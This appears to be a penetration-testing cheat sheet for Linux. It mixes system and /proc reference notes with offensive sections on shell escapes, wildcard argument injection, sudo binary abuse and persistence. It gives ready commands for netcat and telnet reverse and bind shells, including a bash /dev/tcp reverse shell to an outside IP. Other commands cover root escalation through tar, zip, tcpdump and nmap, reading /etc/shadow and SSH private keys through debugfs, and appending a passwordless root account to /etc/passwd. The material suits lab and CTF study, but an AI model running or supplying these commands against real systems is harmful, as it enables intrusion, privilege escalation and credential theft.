Linux

Quick Reference

OS Information

  • System Information
    cat /proc/net/dev
    lspci
    ip link show
    ip addr show
    
    lscpu
    cat /proc/cpuinfo
    
  • File information: file <filename>
  • Shared library dependencies: ldd <filename>
  • Searching:
    • With database: updatedb ; locate sbd.exe
    • Within PATH: which sbd whereis sdb
    • Complex:
      find  /  -­‐name  sbd*
      find / --name sdb* --exec file {} \;
      
    • Search for hidden (dot) filesfind / -type d -name ".*"
  • Mounting Devices:
    mount -t <filesystemtype> <location>
    mount -t /dev/cdrom /media
    umount /dev/cdrom
    
  • Distribution
    cat /etc/issue
    cat /etc/*-release
    cat /etc/lsb-release  ### Debian based
    cat /etc/redhat-release   ### Redhat based
    
  • Environment
    cat /etc/profile
    cat /etc/bashrc
    cat ~/.bash_profile
    cat ~/.bashrc
    cat ~/.bash_logout
    env
    set
    
  • Printers: lpstat -a
  • Sys calls: /usr/include /i386-linux-gnu/asm/unistd_32.h
  • New line in command line
    $ echo "abc[CTRL+M]
    def"
    
  • Change password (one liner): echo root:password | /usr/sbin/chpasswd
  • Bash Variables:
    • $0 - The name of the Bash script
    • $1 - $9 - The first 9 arguments to the Bash script
    • $# - Number of arguments passed to the Bash script
    • $@ - All arguments passed to the Bash script
    • $? - The exit status of the most recently run process
    • $$ - The process ID of the current script
    • $USER - The username of the user running the script
    • $HOSTNAME - The hostname of the machine
    • $RANDOM - A random number
    • $LINENO - The current line number in the script

Kernel

  • To communicate with the kernel, different UNIX systems use different interfaces
    • Before procfs
    • https://opensource.com/article/19/3/virtual-filesystems-linux
    • Source of VFS: https://www.tldp.org/LDP/khg/HyperNews/get/fs/vfstour.html
      • filesystem, must implement the open(), read(), and write() methods
      • kernel treats the generic filesystem as an abstract interface, and these big-three functions are "virtual," with no default definition
      • filesystems like ext4, NFS, and /proc all provide definitions of the big-three functions in a C-language data structure called file_operations
      • filesystems extend and override the VFS functions in the familiar object-oriented way
      • The function definitions that belong to the VFS base type itself are found in the fs/*.c files in kernel source, while the subdirectories of fs/ contain the specific filesystems. https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/fs
      • Listing VFSs: mount | grep -v sd | grep -v :/
    • tempfs (/tmp)
      • https://wiki.archlinux.org/index.php/Tmpfs
      • By default, a tmpfs partition has its maximum size set to half of the available RAM
      • Under systemd, /tmp is automatically mounted as a tmpfs even though no entry is specified in /etc/fstab.
      • tmp.mount systemd unit.
    • procfs (/proc)
      • https://man7.org/linux/man-pages/man5/procfs.5.html
      • a snapshot into the instantaneous state of the kernel and the processes that it controls for userspace
      • special in-memory filesystem
      • used to present process information, kernel processes and other system information in a hierarchical file-like structure
      • This layer is expected to provide convenient access to the said information, acting as an interface to internal data structures in the kernel
      • /proc/sys is where the settings that are configurable via the sysctl command are accessible to userspace
      • File sizes are zero (/proc/meminfo). The truth is that the kernel gathers statistics about memory when a process requests them from /proc
      • Structure:
      • Implementation details:
      • Important items:
        • /proc/PID/cmdline: which contains the command which originally started the process
          • Read confidential information passed in as arguments
        • /proc/PID/environ: a file containing the names and contents of the environment variables that affect the process
          • Read confidential information passed in as environment variables (specially useful in containerized environments, since this is a common practice)
        • /proc/PID/mem: a binary image representing the process's virtual memory, can only be accessed by a ptrace'ing process
        • /proc/PID/maps: the memory map showing which addresses currently visible to that process are mapped to which regions in RAM or to files
          • Useful in binary exploitation (offset calculations, etc.)
        • /proc/cpuinfo: containing information about the CPU
          • Identifying CPU architecture. Useful in binary exploitations to create matching payloads.
        • /proc/version: containing the Linux kernel version, distribution number, gcc version number used to build the kernel and any other pertinent information relating to the version of the kernel currently running
          • Identifying operating system related information architecture. Useful in binary exploitations to create matching payloads.
        • /proc/net/: a directory containing useful information about the network stack, in particular /proc/net/nf_conntrack, which lists existing network connections
          • Get information about network stack and connections.
        • /proc/modules: containing a list of the kernel modules currently loaded . It gives some indication (not always entirely correct) of dependencies.
          • Useful in binary exploitations to create matching payloads.
        • /proc/mounts: a symlink to self/mounts which contains a list of the currently mounted devices and their mount points
          • Get information about the mounted devices (for example: through LFI)
        • /proc/kcore: represents the physical memory of the system (kernel virtual address space region of memory) and is stored in the ELF core file format. (examined by gdb, objdump)
          • /dev/kmem: gives access to the kernel's virtual memory space
          • /dev/mem: gives access to physical memory.
        • /proc/kmsg: used to hold messages generated by the kernel (picked by /bin/dmesg).
    • Sysfs
      • Structured approach to clean-up procfs
      • expose the readable and writable properties of what the kernel calls "kobjects" to userspace
      • purpose of kobjects is reference-counting: when the last reference to a kobject is deleted, the system will reclaim the resources associated with it
      • constitutes most of the kernel's famous "stable ABI to userspace" which no one may ever, under any circumstances, "break."
      • eBPF (extended Berkeley Packet Filter) consists of a virtual machine running inside the kernel that privileged users can query from the command line
      • running eBPF tools on a booted system shows instead what the kernel actually does
      • https://github.com/iovisor/bcc/tree/master/tools
      • vfscount or vfsstat
      • Used by udev to access device and device driver information
      • Sysfs helped clean up the proc file system because much of the hardware information has been moved from proc to sysfs
      • Important items:
        • /sys/bloc: information about block devices
        • /sys/bus: physical bus type supported in the kernel
        • /sys/class: devices classes registered
        • /sys/devices: global device hierarchy of all devices on the system
        • /sys/firmware: firmware objects and attributes
        • /sys/module: subdirectories for each module that is loaded into the kernel
        • /sys/power: system power state can be controlled from this directory.
    • sysctl
      • Usable to change values in /proc/sys directory
      • View current kernel configuration: sysctl -a
      • echo 1 > /proc/sys/net/ipv4/ip_forward
      • sysctl -w net.ipv4.ip_forward=1
      • To make permanent changes, add to /etc/sysctl.conf
  • General information:
    cat /proc/version
    uname -a
    uname -mrs
    rpm -q kernel
    dmesg | grep Linux
    ls /boot | grep vmlinuz-
    
  • Kernel tuning:
    • Temporary: sysctl
    • Permanent: /etc/sysctl.conf
    • View configuration: sysctl -a | less
    • View configuration files for the installed modprobe modules:
      ls -l /etc/modprobe.d/
      ls -R /lib/modules/$( uname -r )/kernel
      
  • Kernel Modules:
    • Insert module: insmod
    • Remove module: modprobe -r rmmod
    • List modules: modprobe -l lsmod

Startup Process

https://null-byte.wonderhowto.com/how-to/linux-basics-for-aspiring-hacker-using-start-up-scripts-0168875/

  • Run levels
    0 - halt the system
    1 - single user mode (minimal services)
    2 - multi-user modes
    3 - multi-user mode
    4 - multi-user mode
    5 - multi-user mode
    6 - reboot the system
    
  • Init.d Process
    • Has process ID: 1
    • /etc/init.d scripts with 755 permission
    • init process then hands over the boot-up processes to rc.d daemon
  • rc.local - Script to start necessary processes in the background when the system boots up: /etc/init.d/rc.local

Daemons

  • inetd, xinetd - Inetd always runs in the background and it then decides when to start and stop other daemons.
  • rlinetd
    rlinetd.conf
    /etc/rlinetd.d
    
    • Disable unnecessary demons
    • Configure IPs that can access a demon

Managing Disks

  • Managing Hard Disks
    • hda for hard disks.
    • sda for newer SATA disks (SCSI).
    • Partitions within sda are sda1, sda2, ...
  • Basic disk Information: df -h
  • Partitions on disk: fdsisk -l
  • Block device information: lsblk
  • Editing and displaying partitions: parted / cfdisk
    • (parted) print
    • (parted) select /dev/sdb
  • Change HDD parameters: hdparm
  • Debugfs
    • Simple-to-use RAM-based file system specially designed for debugging purposes
    • Mount file system (usable to access /root by only being in disk group)
      debugfs /dev/sda1
      

Permissions

  • File Permissions:
    0 = No Permission
    1 = Execute
    2 = Write
    4 = Read
    
    r w x
    4 2 1 = 7
    
  • Setuid - Set User ID - The process's effective user ID gets set to that of the program file itself (rather than that of the user running it).
    • S - just the setuid bit
    • s - setuid bit and execute x
    • Dir - No effect on DIRs
    • Find SUID: find . -perm /4000
  • Setgid - Set Group ID - The process's effective group ID gets set to that of the program file (rather than that of the user's primary group).
  • Find SUID / SGID: find . -perm /6000
  • Find and ls SUID / SGID: find "$DIRECTORY" -perm /6000 -exec ls -la {} \;
  • Searching world writable files: find / -perm -w ~ -type l -ls 2?/dev/null
  • Check file permissions of /etc/passwd and /etc/shadow
  • Find writable files: find -type f -maxdepth 1 -writable

Processes

  • Running processes: ps aux ps -ef top
  • Tree of processes (processes & threads): pstree -aclp
  • Process priority: nice -n -20 <command> renice <nice-value> <pid>
    • -20 is highest priority
    • 19 is lowest priority
  • Memory map for a process: cat /proc/1234/maps gdb> info proc mappings pmap -d 1234
  • /proc - /proc/<id>/environ environment variables - /proc/<id>/cmdline command line args/command used to run the process - /proc/<id>/maps memory map - /proc/<id>/fd open file descriptors
  • Trace system and library calls
    • ltrace
    • strace
  • Access control
    • access - Check permissions for the UID and GID of the process (executable file owner / group)
      • Check is done using the calling process's real UID and GID, rather than the effective IDs as is done when actually attempting an operation (e.g., open(2)) on the file.
  • Process ID of a port: fuser -n tcp (PORT NUMBER) ps aux | grep $(fuser -n tcp 45295 | awk '{print $2}')

Services

  • List of Services: cat /etc/services
  • Commons service configurations
    cat /etc/syslog.conf
    cat /etc/chttp.conf
    cat /etc/lighttpd.conf
    cat /etc/cups/cupsd.conf
    cat /etc/inetd.conf
    cat /etc/apache2/apache2.conf
    cat /etc/my.conf
    cat /etc/httpd/conf/httpd.conf
    cat /opt/lampp/etc/httpd.conf
    ls -aRl /etc/ | awk '$1 ~ /^.*r.*/
    
  • Check if certain service is up: update-­‐rc.d ssh enable
  • Auto start a service: update-­‐rc.d ssh enable
  • Systemd services: /lib/systemd/system/snapd.service
  • Systemd socket unit file:
    [Socket]
    ListenStream=/run/snapd.socket
    ListenStream=/run/snapd-snap.socket
    SocketMode=0666
    
    • 0666 - Allow any process to connect and communicate with the socket.

Networking

  • Interface Information
    /sbin/ifconfig -a
    cat /etc/network/interfaces
    cat /etc/sysconfig/network
    
  • Network configuration
    cat /etc/resolv.conf
    cat /etc/sysconfig/network
    cat /etc/networks
    iptables -L
    hostname
    dnsdomainname
    
  • Monitor network communication
    lsof -i
    lsof -i :80
    grep 80 /etc/services
    netstat -antup
    netstat -antpx
    netstat -tulpn
    chkconfig --list
    chkconfig --list | grep 3:on
    last
    w
    
  • Cached IP and Mac Information
    arp -e
    route
    /sbin/route -nee
    
  • Change IP
    ifconfig eth0 192.168.1.115
    ifconfig eth0 192.168.1.115 netmask 255.255.255.0 broadcast 192.168.1.255
    
  • Shell with built-in tools
    nc -lvp 4444### Attacker. Input (Commands)
    nc -lvp 4445### Attacker. Ouput (Results)
    telnet [atackers ip] 44444 | /bin/sh | [local ip] 44445### On the targets system. Use the attackers IP!
    
  • AF_UNIX - Used to communicate between processes on the same machine
  • AF_INET and AF_INET6 - Used for processes to communicate over a network connection.
  • Interact with AF_UNIX Socket
    nc -U /run/snapd.socket
    GET / HTTP/1.1
    Host: 127.0.0.1
    
  • Process ID of a port: fuser -n tcp (PORT NUMBER) ps aux | grep $(fuser -n tcp 45295 | awk '{print $2}')

Tools

Tools

Option Details
-i Ignore case
-r -R Recursive grep -R "example" /etc/apache2/
-w Match words
-e Regex match grep -w -e 'word1|word2' /path/to/file
-n Line number
-c Count
-v Invert
-x Exact match
-l File names with match
-L File names without match
  • iptables
    • count packets sent and received
      iptables -Z && iptables -F
      iptables -I INPUT 1 -s IP -j ACCEPT
      iptables -I OUTOUT 1 -d IP -j ACCEPT
      ip tables -vn -L
      
  • Netcat
    • Chat
      nc -nlvp 4444
      nc -nv <ip> 4444
      
    • File Transfer
      nc -nlvp 4444 > file.exe  
      nc -nv <ip> 4444 < file.exe
      
    • Bind Shell
      • VICTIM (server): nc -lvp 4444 -e cmd.exe
      • ATTACKER (client): nc -nv <IP Address> 4444
    • Reverse Shell
      • ATTACKER (server): nc -lvp 4444
      • VICTIM (client): nc -nv <IP Address> 4444 -e cmd.exe
    • NCAT for increased security
      • VICTIM (server): ncat -lvp 4444 -e cmd.exe --allow 192.168.30.5 --ssl
      • ATTACKER (client): ncat -nv <IP Address> 4444 --ssl
    • Port Scanning
      • TCP Connect Port Scan: nc -nvv -w 1 -z <ip> 1-65550
      • UDP Scan: nc -unvv -w 1 -z <ip> 1-65550
  • tcpdump
    • Packet Capture
      tcpdump tcp dst [ip] [port] and tcp dst [ip] [port]
      tcpdump tcp dst 192.168.1.7 80 and tcp dst 10.5.5.252 21
      
    • Open a PCAP: tcpdump -­r password_cracking_filtered.pcap
    • Cut only IP addresses from the traffic: tcpdump -­r password_cracking_filtered.pcap | awk-­‐F" " '{print $3}' | sort -­‐u | head
    • Filter Destination or Source
      tcpdump -n src host <ip> -­r password_cracking_filtered.pcap
      tcpdump -n dst host <ip> r password_cracking_filtered.pcap
      tcpdump -n port <port> -­r password_cracking_filtered.pcap
      
    • Advanced Header Filtering: tcpdump -A -n 'tcp[13] = 24' -­‐r password_cracking_filtered.pcap
    • Other important flags
      • -nn stop DNS and service names lookup (performance+)
      • -X and -XX can be used to print each packet in hex and ascii
      • -A print packets in ASCII
      • -S to print absolute sequence numbers
      • -s can be used to increase the default snap-length from 262144 to higher
      • -s 0 to capture full packet
    • References:

General Exploits

Enumeration Scripts

Escape shell

  • Information about environment:
    env
    echo $PATH
    echo /usr/local/rbin/*
    
  • List read only variables (check If PATH or SHELL is writable): export -p
  • VI / VIM: :set shell=/bin/bash :shell :sh | :! /bin/bash| :r /root/root.txt | :e /root/root.txt
  • AWK: awk 'BEGIN {system("/bin/sh")}'
  • Find: find / -name blahblah -exec /bin/awk 'BEGIN {system("/bin/sh")}' \;
  • More / Less / Man: ! /bin/sh !/bin/sh !bash
  • Tee: echo "evil script code" | tee script.sh
  • Languages
    python: exit_code = os.system('/bin/sh') output = os.popen('/bin/sh').read()
    perl -e 'exec "/bin/sh";'
    perl: exec "/bin/sh";
    ruby: exec "/bin/sh"
    lua: os.execute('/bin/sh')
    irb(main:001:0> exec "/bin/sh"
    
  • Copy files into $PATH
  • Copy file into HOME (scp/ftp)
  • Some restricted shells will start by running some files in an unrestricted mode (If your .bash_profile is executed in an restricted mode and it's editable)
  • If HISTFILE and HISTSIZE are writable:
    • Set HISTFILE to the file you want to overwrite (preferably an executable)
    • Set HISTSIZE to 0 and then back to 100,
    • Then execute the lines you want in your shell script
  • https://pen-testing.sans.org/blog/2012/06/06/escaping-restricted-linux-shells
  • https://fireshellsecurity.team/restricted-linux-shell-escaping-techniques/

Wildcards

Char Description
* Any number of characters, including none.
? Any single character.
[ ] Set of characters, any one of which may match a single character at that position.
- Used within [ ] denotes a range of characters.
~ At the beginning of a word expands to the name of your home directory. If you append another user's login name to the character, it refers to that user's home directory.
  • Using wildcard to inject arguments
    # ls -al
    drwxrwxr-x.  2 leon   leon   4096 Oct 28 17:04 DIR1
    drwxrwxr-x.  2 leon   leon   4096 Oct 28 17:04 DIR2
    -rw-rw-r--.  1 leon   leon      0 Oct 28 17:03 file1.txt
    -rw-rw-r--.  1 leon   leon      0 Oct 28 17:03 file2.txt
    -rw-rw-r--.  1 nobody nobody    0 Oct 28 16:38 -rf
    
    # rm *
    # ls -al
    -rw-rw-r--.  1 nobody nobody    0 Oct 28 16:38 -rf
    
    # strace rm *
    execve("/bin/rm", ["rm", "DIR1", "DIR2", "file1.txt", "file2.txt", "-rf"], [/* 25 vars */]) = 0
    
  • chown
    --reference=RFILE
            use RFILE's owner and group rather than specifying OWNER:GROUP values
    
    # ls -la
    -rw-r--r--.  1 leon leon    0 Oct 28 17:40 .drf.php
    -rw-rw-r--.  1 user user  117 Oct 28 17:35 inc.php
    -rw-rw-r--.  1 user user  111 Oct 28 17:38 index.php
    -rw-rw-r--.  1 leon leon    0 Oct 28 17:45 --reference=.drf.php
    
    # chown -R nobody:nobody *.php
    
    # ls -la
    -rw-r--r--.  1 leon leon    0 Oct 28 17:40 .drf.php
    -rw-rw-r--.  1 leon leon  117 Oct 28 17:35 inc.php
    -rw-rw-r--.  1 leon leon  111 Oct 28 17:38 index.php
    -rw-rw-r--.  1 leon leon    0 Oct 28 17:45 --reference=.drf.php
    
  • chmod
    --reference=RFILE
                use RFILE's mode instead of MODE values
    
    # ls -la
    -rwxrwxrwx.  1 leon leon     0 Oct 29 00:40 .drf.php
    -rw-rw-r--.  1 user user   117 Oct 28 17:36 inc.php
    -rw-rw-r--.  1 user user   111 Oct 28 17:38 index.php
    -rw-r--r--.  1 leon leon     0 Oct 29 00:41 --reference=.drf.php
    
    # chmod 000 *
    
    # ls -la
    -rwxrwxrwx.  1 leon leon     0 Oct 29 00:40 .drf.php
    -rwxrwxrwx.  1 user user   117 Oct 28 17:36 inc.php
    -rwxrwxrwx.  1 user user   111 Oct 28 17:38 index.php
    -rw-r--r--.  1 leon leon     0 Oct 29 00:41 --reference=.drf.php
    
  • tar command Execution
    --checkpoint[=NUMBER]
        display progress messages every NUMBERth record (default 10)
    
    --checkpoint-action=ACTION
        execute ACTION on each checkpoint
    
    # ls -la
    -rw-r--r--.  1 leon leon     0 Oct 28 19:19 --checkpoint=1
    -rw-r--r--.  1 leon leon     0 Oct 28 19:17 --checkpoint-action=exec=sh shell.sh
    -rw-rw-r--.  1 user user   117 Oct 28 17:36 inc.php
    -rw-rw-r--.  1 user user   111 Oct 28 17:38 index.php
    -rwxr-xr-x.  1 leon leon    12 Oct 28 19:17 shell.sh
    
    #  tar cf archive.tar *
    uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
    uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
    
  • Rcync command Execution
    -e, --rsh=COMMAND           specify the remote shell to use
        --rsync-path=PROGRAM    specify the rsync to run on remote machine
    
    # ls -al
    -rw-r--r--.  1 leon leon     0 Mar 28 04:45 -e sh shell.c
    -rwxr-xr-x.  1 user user   117 Oct 28 17:36 inc.php
    -rwxr-xr-x.  1 user user   111 Oct 28 17:38 index.php
    -rwxr-xr-x.  1 leon leon    31 Mar 28 04:45 shell.c
    
    # rsync -t *.c foo:src/
    rsync: connection unexpectedly closed (0 bytes received so far) [sender]
    rsync error: error in rsync protocol data stream (code 12) at io.c(601) [sender=3.0.8]
    
    # ls -al
    -rw-r--r--.  1 leon leon     0 Mar 28 04:45 -e sh shell.c
    -rwxr-xr-x.  1 user user   117 Oct 28 17:36 inc.php
    -rwxr-xr-x.  1 user user   111 Oct 28 17:38 index.php
    -rwxr-xr-x.  1 leon leon    31 Mar 28 04:45 shell.c
    -rw-r--r--.  1 root root   101 Mar 28 04:49 shell_output.txt
    
    # cat shell.c
    /usr/bin/id > shell_output.txt
    
    # cat shell_output.txt
    uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
    
  • Practice
    • HTB - Joker
  • Create a script, setuid bit and then use this attack to chown the script to gain prev-esc

Exploits Related to Tools

  • Tar: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash
    echo -e '#!/bin/bash\n\nbash -i >& /dev/tcp/10.10.15.99/8082 0>&1' > a.sh
    tar -cvf a.tar a.sh
    sudo tar -xvf a.tar --to-command /bin/bash
    
  • Zip: sudo zip /tmp/test.zip /tmp/test -T --unzip-command="sh -c /bin/bash"
  • Strace: sudo strace -o/dev/null /bin/bash
  • tcpdump
    echo $’id\ncat /etc/shadow’ > /tmp/.shell
    chmod +x /tmp/.shell
    sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.shell-Z root
    
  • nmap
    echo "os.execute('/bin/sh')" > /tmp/shell.nse
    sudo nmap --script=/tmp/shell.nse
    
  • scp: sudo scp -S /path/yourscript x y
  • except: sudo except spawn sh then sh
  • nano: sudo nano -S /bin/bash
    • type your command and hit CTRL+T
  • git: sudo git help status
    • type: !/bin/bash
  • gdb/ftp: sudo ftp
    • type : !/bin/sh

Other

  • File execution due to not using quotes
    # Files in `SLAPPER_FILES` list will get executed:
    for i in ${SLAPPER_FILES}; do
    if [ -f ${i} ]; then
        file_port=$file_port $i
        # Correction: file_port="$file_port $i"
        STATUS=1
    fi
    done
    
  • Connect to existing TMUX session: tmux -S /.devs/dev_sess
  • Screenshot
  • Important Groups
    • shadow - can read /etc/shadow
    • disk - raw access to files
      • debugfs /dev/sda1
      • debugfs: cat /root/.ssh/id_rsa
      • debugfs: cat /etc/shadow
    • video - access to framebuffer
      • cat /dev/fb0 > /tmp/screen.raw
      • cat /sys/class/graphics/fb0/virtual_size
    • root
      • find / -group root -perm -g=w 2>/dev/null
  • Hacking Linux Part I: Privilege Escalation: http://www.dankalia.com/tutor/01005/0100501004.htm
    • Abusing users with '.' in their PATH
    • Shell Escape Sequences
    • IFS Exploit
    • LD_PRELOAD Exploit
    • Symlinks
  • Find plain text username / password
    grep -i user [filename]
    grep -i pass [filename]
    grep -C 5 "password" [filename]
    find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password"   # Joomla
    
  • Commands with sudo: sudo -l
  • New file Permissions: umask
  • Generate password hash (md5): openssl passwd -1 echo 'joske' | openssl passwd -1 -stdin
  • Generate password hash (sha256): python -c "import crypt; print crypt.crypt('joske')"
  • Add user with passwd
    echo 'user2:*:1002:1003:,,,:/home/user2:/bin/bash' >> /etc/passwd
    passwd user2
    
    echo "user2:`openssl passwd -1 -salt user3 pass123`:1002:1003:,,,:/home/user2:/bin/bash" >> /etc/passwd
    
    echo "user2:`mkpasswd -m SHA-512 pass`:1002:1003:,,,:/home/user2:/bin/bash" >> /etc/passwd
    
    echo "user2:`python -c 'import crypt; print crypt.crypt("pass", "$6$salt")'`:1002:1003:,,,:/home/user2:/bin/bash" >> /etc/passwd
    
    echo "user2:`perl -le 'print crypt("pass123", "abc")'`:1002:1003:,,,:/home/user2:/bin/bash" >> /etc/passwd
    
    echo "user2:`php -r "print(crypt('aarti','123') . \"\n\");"`:1002:1003:,,,:/home/user2:/bin/bash" >> /etc/passwd
    
  • Add root user
    adduser username
    usermod -aG sudo username
    
    echo 'trevelyn::0:0:root:/root:/bin/bash' >> /etc/passwd
    
  • Change user password
    echo "trevelyn:trevelyn"| /usr/sbin/chpasswd
    

References

Important Files

  • GTFOBins is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions: https://gtfobins.github.io/
  • Files owned by User: find / -type f -uid 1000 -ls 2>/dev/null
  • Environment variables: /proc/self/environ
  • Email: /var/log/mail/USER
  • Private keys: ~/.ssh/id_rsa
  • APT sources: /etc/apt/sources.list
  • Order of name resolution: /etc/nsswitch.conf
  • DNS Hosts File: /etc/hosts
  • DNS sever Information: /etc/resolv.conf
  • Kernel module config: /etc/sysctl.conf
  • Sys calls: /usr/include /i386-linux-gnu/asm/unistd_32.h
  • Os Info: /etc/issue /proc/version
  • Cron: /etc/crontab
  • Bootloader - GRUB2
    • Main configuration file (replaces menu.lst in GRUB (v1)): /boot/grub/grub.cfg
    • Directory contains the scripts that build the grub.cfg: /etc/grub.d
      • 00_header - Loads the settings from /etc/default/grub
      • 05_debian_theme - Defines the colors, background, etc.
      • 10_linux - Loads the menu entries
      • 20_memtest86 - Loads the memory tester
      • 30_os-prober - Scans the hard drives for other operating systems
      • 40_custom - Template for manually adding other menu entries
    • File contains the GRUB menu settings: /etc/default/grub
      • Run update-grub after modifying.
  • Samba: /etc/samba/smb.conf
  • Logs:
    • Syslog: /etc/rsyslog.conf
    • Log mail events of all priorities to /var/log/mail: mail.* /var/log/mail
    • Log all events of the emergency priority (emerg) to all logged on users: .emerg
  • Squid Proxy: /etc/squid/squid.conf /etc/squid/passwords
  • Apache:
    • /var/log/apache2/access.log
    • /etc/apache2/sites-enabled/000-default.conf
    • /etc/apache/sites-enabled/000-default.conf
    • /etc/httpd/sites-enabled/000-default.conf
  • TFTPD: /etc/default/tftpd-hpa
  • PHP Sessions: /tmp/sess_ID /var/lib/php5/sess_ID
/etc/issue
/proc/version
/etc/profile
/root/.bash_history
/var/log/dmessage
/var/mail/root
/var/spool/cron/crontabs/root

Passwords

/etc/passwd
/etc/shadow

/etc/pwd.db
/etc/passwd

/etc/spwd.db
/etc/shadow

/etc/master.passwd

Special File Handling

  • 7z files
    • Print file information: 7z l -slt example.zip
    • Extract: 7z x example.zip
  • Microsoft Outlook Personal Folder (PST)
    • Examine: readpst -tea -m example.pst

Defense

References

Point of no C3 | Linux Kernel Exploitation

Tools

Checklists